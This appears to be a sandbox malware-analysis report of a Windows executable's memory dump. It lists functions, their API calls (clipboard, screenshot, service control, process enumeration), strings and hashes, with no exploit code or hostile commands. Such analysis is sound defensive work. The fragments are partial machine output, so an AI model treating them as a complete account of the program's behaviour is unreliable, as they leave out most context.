                                                      control_flow_graph 82 4109ae-4109ca call 410b9c GetModuleHandleA 85 4109eb-4109ee 82->85 86 4109cc-4109d7 82->86 88 410a17-410a64 __set_app_type __p__fmode __p__commode call 410b98 85->88 86->85 87 4109d9-4109e2 86->87 90 410a03-410a07 87->90 91 4109e4-4109e9 87->91 96 410a72-410acc call 410b86 _initterm __getmainargs _initterm 88->96 97 410a66-410a71 __setusermatherr 88->97 90->85 94 410a09-410a0b 90->94 91->85 93 4109f0-4109f7 91->93 93->85 98 4109f9-410a01 93->98 95 410a11-410a14 94->95 95->88 101 410b08-410b0b 96->101 102 410ace-410ad6 96->102 97->96 98->95 103 410ae5-410ae9 101->103 104 410b0d-410b11 101->104 105 410ad8-410ada 102->105 106 410adc-410adf 102->106 108 410aeb-410aed 103->108 109 410aef-410b00 GetStartupInfoA 103->109 104->101 105->102 105->106 106->103 107 410ae1-410ae2 106->107 107->103 108->107 108->109 110 410b13-410b15 109->110 111 410b02-410b06 109->111 112 410b16-410b2a GetModuleHandleA call 403608 110->112 111->112 115 410b33-410b73 _cexit call 410bd5 112->115 116 410b2c-410b2d exit 112->116 116->115
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                      • String ID:
                                                      • API String ID: 3662548030-0
                                                      • Opcode ID: f07cd8281bd0eef026c145cfcef703825ef265d38ac0e4a0f6066f93efc5ebb1
                                                      • Instruction ID: cc526e6bbcca00d755beed77e4c14bf94675ec1b2c2e5d9affb58e5f706cce2a
                                                      • Opcode Fuzzy Hash: f07cd8281bd0eef026c145cfcef703825ef265d38ac0e4a0f6066f93efc5ebb1
                                                      • Instruction Fuzzy Hash: 3941A370D05348DFDB20DFA5D8856EE7BB4AF08354F20816BE551A72A1D7B859C2CB1C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 120 4071e1-407204 GetWindowPlacement 121 40720a-40720c 120->121 122 4070ad-4070af 120->122 123 407250-4076ec ShowWindow 121->123 122->123
                                                      APIs
                                                      • GetWindowPlacement.USER32(?,?), ref: 004071F3
                                                      • ShowWindow.USER32(?,00000005), ref: 00407253
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$PlacementShow
                                                      • String ID: ,
                                                      • API String ID: 139272362-3772416878
                                                      • Opcode ID: e45384bb7b80e83c21bf432214024b70f437442ed10f215526af609af5b0b85d
                                                      • Instruction ID: 488eb4e3c8cfaa75f66f03325ff8e7c41bda078349391e5383aed3a56be706e5
                                                      • Opcode Fuzzy Hash: e45384bb7b80e83c21bf432214024b70f437442ed10f215526af609af5b0b85d
                                                      • Instruction Fuzzy Hash: 1EE0ED32A04208EFDF109B94EC09BEDB771EB40361F208437F612B90E4D37969499A0A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 125 407225-407248 GetWindowPlacement 126 4070ad-4070af 125->126 127 40724e 125->127 128 407250-407259 ShowWindow 126->128 127->128 129 4076e8-4076ec 128->129
                                                      APIs
                                                      • GetWindowPlacement.USER32(?,?), ref: 00407237
                                                      • ShowWindow.USER32(?,00000005), ref: 00407253
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$PlacementShow
                                                      • String ID: ,
                                                      • API String ID: 139272362-3772416878
                                                      • Opcode ID: b9b0f01d9435d210b30eb168350d838b4fe8ab924f5220319e08e4535ea70096
                                                      • Instruction ID: 0944c4d53ad902cea0407e537049be98cd47ab29d924df84caff37d8319bf5d1
                                                      • Opcode Fuzzy Hash: b9b0f01d9435d210b30eb168350d838b4fe8ab924f5220319e08e4535ea70096
                                                      • Instruction Fuzzy Hash: ECE0ED32A04208EFDF118B94E808BECB775AB40361F208436E602B90E4C3B95A098A06

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 130 4071b2-4071bd IsWindowVisible 131 406fa1-406fa3 130->131 132 4071c3-4071c5 130->132 133 407250-4076ec ShowWindow 131->133 132->133
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 004071B5
                                                      • ShowWindow.USER32(?,00000005), ref: 00407253
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ShowVisible
                                                      • String ID:
                                                      • API String ID: 4185057100-0
                                                      • Opcode ID: d40449464b4047ac30e2f08daab078d74676a49c2ef9bbb6d019a29481b258b7
                                                      • Instruction ID: 73275c178affd846a24b2184eb31fce0e7f5b24e22b52912f637cddb3408e108
                                                      • Opcode Fuzzy Hash: d40449464b4047ac30e2f08daab078d74676a49c2ef9bbb6d019a29481b258b7
                                                      • Instruction Fuzzy Hash: EED09232648105EADB112B25BC09B997720AB907A6F21C037F703B90E0D67AA461AA1E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 4070ad-4076ec ShowWindow
                                                      APIs
                                                      • ShowWindow.USER32(?,00000005), ref: 00407253
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 8a1bec2b98c65d460e9c0dd57be8462012df7da087a7a37d62e699727b122443
                                                      • Instruction ID: 226fa48927d3fdd7dc7efc31f055c4cf0843709fac406fb857b610709aab6821
                                                      • Opcode Fuzzy Hash: 8a1bec2b98c65d460e9c0dd57be8462012df7da087a7a37d62e699727b122443
                                                      • Instruction Fuzzy Hash: CEB09B33748104D7C7011759BC05B9C771097903B6F208537F703B40E092755451551F

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 135 406f83-4076ec ShowWindow
                                                      APIs
                                                      • ShowWindow.USER32(?,00000005), ref: 00407253
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: aee65bd171f549207724a9ea865a06be34d7caa89f0e7521b04c39c2fd2d5c7c
                                                      • Instruction ID: 3233370c77f959def4cfdb733db00f5ee0b13b50270c126f6874236bb3519daa
                                                      • Opcode Fuzzy Hash: aee65bd171f549207724a9ea865a06be34d7caa89f0e7521b04c39c2fd2d5c7c
                                                      • Instruction Fuzzy Hash: EDB09B33748104D7C7411759FC05B9C7710A7903B5F20C537F743B40E086755455561F

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 138 406fa1-4076ec ShowWindow
                                                      APIs
                                                      • ShowWindow.USER32(?,00000005), ref: 00407253
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: fbbf48d6404762567680356dcc5cc0b4ec1ac16cbb025118edd27d81640ceccf
                                                      • Instruction ID: 60922bdaa2309494e6786f783de06aba103c5ec7039c8357086265bb8e9037be
                                                      • Opcode Fuzzy Hash: fbbf48d6404762567680356dcc5cc0b4ec1ac16cbb025118edd27d81640ceccf
                                                      • Instruction Fuzzy Hash: 51B09233748004E7CB012B59BC09B9CB720AB903B6F208437F703B80E0827AA452A62F
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClipboardMetricsObjectSystematoi$DeleteSelect$CapsCompatibleCreateDevice$BitmapCloseDataEmptyOpenRelease_strcmpi
                                                      • String ID: *clipboard*$savescreenshotfull
                                                      • API String ID: 475398151-1175602438
                                                      • Opcode ID: be59e807089f97248b745c53ca39a3219066a74f0194714f243bc5dd474e570e
                                                      • Instruction ID: 0a69b510856051f6b61d0db1a9f81b190fa99b7c01e08b7c8ab97ef6d6a55185
                                                      • Opcode Fuzzy Hash: be59e807089f97248b745c53ca39a3219066a74f0194714f243bc5dd474e570e
                                                      • Instruction Fuzzy Hash: 515105B2910288EFDF11AFA1DC499DD3FA9FF08341B10812AFA25D5271DB3AC585DB58
                                                      APIs
                                                      • memset.MSVCRT ref: 0040476E
                                                      • memset.MSVCRT ref: 00404782
                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,?,?,00000000,?), ref: 00404792
                                                      • strlen.MSVCRT ref: 0040479D
                                                      • strlen.MSVCRT ref: 004047AB
                                                      • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 004047EE
                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00404804
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,?), ref: 0040481F
                                                      • CloseHandle.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,00000000,?), ref: 00404853
                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?), ref: 0040485A
                                                      • PostMessageA.USER32(?,000005B4,00000000,00000000), ref: 00404873
                                                      • EnumWindows.USER32(004046F1,00000000), ref: 0040489B
                                                      • memset.MSVCRT ref: 004048B1
                                                      • memset.MSVCRT ref: 004048DC
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004048F7
                                                        • Part of subcall function 0040249D: _mbscpy.MSVCRT ref: 004024A5
                                                        • Part of subcall function 0040249D: _mbscat.MSVCRT ref: 004024B4
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040491C
                                                      • memset.MSVCRT ref: 0040492D
                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040499D
                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 004049AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$CloseHandleProcess$WindowWindowsstrlen$ByteCharCreateDirectoryEnumFindFreeLibraryMessageMultiOpenPostThreadWide_mbscat_mbscpy
                                                      • String ID: Explorer.exe$Progman$Shell_TrayWnd
                                                      • API String ID: 2750907313-131944459
                                                      • Opcode ID: cb09099854295c43a2b8ff19ec6d32d7f7522e536fc81669b07e6c71d5f430a7
                                                      • Instruction ID: ba8633467671cd5b80a546ab6ba77b9489af45562576cd9ba7d9b61210ecae71
                                                      • Opcode Fuzzy Hash: cb09099854295c43a2b8ff19ec6d32d7f7522e536fc81669b07e6c71d5f430a7
                                                      • Instruction Fuzzy Hash: 5D7131F280024CAFEB10EFA5DD899DE77ACEB48345F10417AFB05E21A1D7799D848B58
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040AFCC), ref: 0040EEA2
                                                      • GetProcAddress.KERNEL32(00000000,OpenSCManagerA), ref: 0040EEC4
                                                      • GetProcAddress.KERNEL32(OpenServiceA), ref: 0040EED6
                                                      • GetProcAddress.KERNEL32(ChangeServiceConfigA), ref: 0040EEE8
                                                      • GetProcAddress.KERNEL32(CloseServiceHandle), ref: 0040EEFA
                                                      • GetProcAddress.KERNEL32(QueryServiceConfigA), ref: 0040EF0C
                                                      • GetProcAddress.KERNEL32(ControlService), ref: 0040EF1E
                                                      • GetProcAddress.KERNEL32(EnumServicesStatusA), ref: 0040EF30
                                                      • GetProcAddress.KERNEL32(StartServiceA), ref: 0040EF42
                                                      • GetProcAddress.KERNEL32(QueryServiceStatus), ref: 0040EF54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: ChangeServiceConfigA$CloseServiceHandle$ControlService$EnumServicesStatusA$OpenSCManagerA$OpenServiceA$QueryServiceConfigA$QueryServiceStatus$StartServiceA$advapi32.dll
                                                      • API String ID: 2238633743-2061868645
                                                      • Opcode ID: 344faffb4b7b826b12b50d1421389f04ec4ef83f9d2c08039f414dc6b9b10eec
                                                      • Instruction ID: 418a491fe3cfce54451dfe406bf80278b8cdb31336258cd7a5db0b70653a29a2
                                                      • Opcode Fuzzy Hash: 344faffb4b7b826b12b50d1421389f04ec4ef83f9d2c08039f414dc6b9b10eec
                                                      • Instruction Fuzzy Hash: 09211AB4D45305FEDB616F66AC085C67EA8EB98B1132B8577E414922B8D3BDC4D0DE0C
                                                      APIs
                                                        • Part of subcall function 0040E631: ??3@YAXPAX@Z.MSVCRT ref: 0040E638
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E3B5
                                                      • memset.MSVCRT ref: 0040E3CA
                                                      • Process32First.KERNEL32(?,?), ref: 0040E3E6
                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000), ref: 0040E42B
                                                      • memset.MSVCRT ref: 0040E451
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,?,?,?,00000000), ref: 0040E484
                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameA), ref: 0040E49E
                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,00000000), ref: 0040E4D9
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E4F0
                                                      • Process32Next.KERNEL32(?,00000128), ref: 0040E537
                                                      • CloseHandle.KERNEL32(?,?,00000128,?,00000000), ref: 0040E547
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                      • String ID: QueryFullProcessImageNameA$kernel32.dll
                                                      • API String ID: 912665193-4191084282
                                                      • Opcode ID: 000bacaa7645c968ad6c93fedf77a3532d2bfdbba3292d1b8f05eaafc22c9714
                                                      • Instruction ID: 22f6b5d8a5d7ba25a835bc5a6d0e0b54d3d71652abc0443083e486f9bdf64a2c
                                                      • Opcode Fuzzy Hash: 000bacaa7645c968ad6c93fedf77a3532d2bfdbba3292d1b8f05eaafc22c9714
                                                      • Instruction Fuzzy Hash: 955190B28002589FDB20DF56DC44ADABBB9EF44304F1085BBF919E32A1D7789A84CF54
                                                      APIs
                                                        • Part of subcall function 00402174: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004018B7,?), ref: 00402186
                                                      • memset.MSVCRT ref: 004018DD
                                                        • Part of subcall function 004027E6: ReadFile.KERNEL32(?,?,?,00000000,00000000,?,?,004018F1,00000000,?,00000004,?,00000000,00002C82), ref: 004027FD
                                                      • OpenClipboard.USER32(00000000), ref: 0040192E
                                                      • EmptyClipboard.USER32 ref: 0040193C
                                                      • RegisterClipboardFormatA.USER32(?), ref: 00401968
                                                      • GlobalAlloc.KERNEL32(00002000,?), ref: 00401978
                                                      • GlobalFix.KERNEL32(00000000), ref: 00401981
                                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040199D
                                                      • SetClipboardData.USER32(00000000,00000000), ref: 004019A8
                                                      • CloseClipboard.USER32 ref: 004019C1
                                                      • CloseHandle.KERNEL32(?), ref: 004019CA
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$CloseFile$AllocCreateDataEmptyFormatHandleOpenReadRegisterWirememset
                                                      • String ID:
                                                      • API String ID: 1820477087-0
                                                      • Opcode ID: 27e98e7ce88468d185cc580e87b1daafe92301e27ca3b71c4977a2f695b26421
                                                      • Instruction ID: a4675c394ecfa312ea33a2611eefacf7057a796e26163bc2cfd1bbe495d6977c
                                                      • Opcode Fuzzy Hash: 27e98e7ce88468d185cc580e87b1daafe92301e27ca3b71c4977a2f695b26421
                                                      • Instruction Fuzzy Hash: E031A4B1900119ABDF206B65DD4DDEE7BBCFF04740B108176F945E11E1DB388AC0DAA9
                                                      APIs
                                                      • GetObjectA.GDI32(?,00000054,?), ref: 0040208F
                                                      • GetDC.USER32(00000000), ref: 00402099
                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 004020AD
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004020B7
                                                      • OpenClipboard.USER32(00000000), ref: 004020BE
                                                      • EmptyClipboard.USER32 ref: 004020C8
                                                      • SetClipboardData.USER32(00000002,00000000), ref: 004020D1
                                                      • CloseClipboard.USER32 ref: 004020D7
                                                      • DeleteObject.GDI32(?), ref: 004020E0
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Object$BitmapCloseCreateDataDeleteEmptyOpenRelease
                                                      • String ID:
                                                      • API String ID: 3734427525-0
                                                      • Opcode ID: 948b49efa78cd34cb5948a2ead1d77f7f8d012ee64414373ebdb9c90fa15f676
                                                      • Instruction ID: e756e6b672d2ad74e9aae53a1f8223d3d6b4f8ecfadebc21002408b4ecf6dbe6
                                                      • Opcode Fuzzy Hash: 948b49efa78cd34cb5948a2ead1d77f7f8d012ee64414373ebdb9c90fa15f676
                                                      • Instruction Fuzzy Hash: C6114872910104AFDB11ABA5EE4CDEFBBBCEF49751B004066F702E20B0DB748941DB28
                                                      APIs
                                                      • _strcmpi.MSVCRT ref: 00405CC9
                                                      • GetSystemTime.KERNEL32(A]@,00000000,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?,?), ref: 00405CD8
                                                      • SystemTimeToFileTime.KERNEL32(A]@,00000104,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?,?), ref: 00405CE5
                                                      • SystemTimeToFileTime.KERNEL32(A]@,00000104,00000000,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?), ref: 00405D06
                                                      • LocalFileTimeToFileTime.KERNEL32(00000104,00000104,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?,?), ref: 00405D13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$File$System$Local_strcmpi
                                                      • String ID: A]@$now
                                                      • API String ID: 7067941-3605966695
                                                      • Opcode ID: df99af5a4a662ce0a6d35c5511d520787173456d950dc7badcefee651531a9b7
                                                      • Instruction ID: 51a47e60848779fae563b60881bb9ff1b1cbc194a6934f6798404855bdc15f22
                                                      • Opcode Fuzzy Hash: df99af5a4a662ce0a6d35c5511d520787173456d950dc7badcefee651531a9b7
                                                      • Instruction Fuzzy Hash: 9BF0E175914209BBDF00ABA5DD49CDF7FBCEF58309B508432F601E60A1E634D5968B68
                                                      APIs
                                                      • EmptyClipboard.USER32 ref: 00402D5F
                                                      • strlen.MSVCRT ref: 00402D6C
                                                      • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00402D7B
                                                      • GlobalFix.KERNEL32(00000000), ref: 00402D88
                                                      • memcpy.MSVCRT ref: 00402D91
                                                      • GlobalUnWire.KERNEL32(00000000), ref: 00402D9A
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00402DA3
                                                      • CloseClipboard.USER32 ref: 00402DB3
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                      • String ID:
                                                      • API String ID: 2315226746-0
                                                      • Opcode ID: 4222e3de1cb9742e78f938fe2f349ccf721dc592388a3f7435670d0f688f4f60
                                                      • Instruction ID: 3224cc0a3c9a0eb15d6280a53dbee06dfb7e3d032b9334d82fb88866c6fb4748
                                                      • Opcode Fuzzy Hash: 4222e3de1cb9742e78f938fe2f349ccf721dc592388a3f7435670d0f688f4f60
                                                      • Instruction Fuzzy Hash: DCF0BB776002196BD3512BA0BC4DDDB7B6CDB88B957014179FB05D2162DA748C4047B9
                                                      APIs
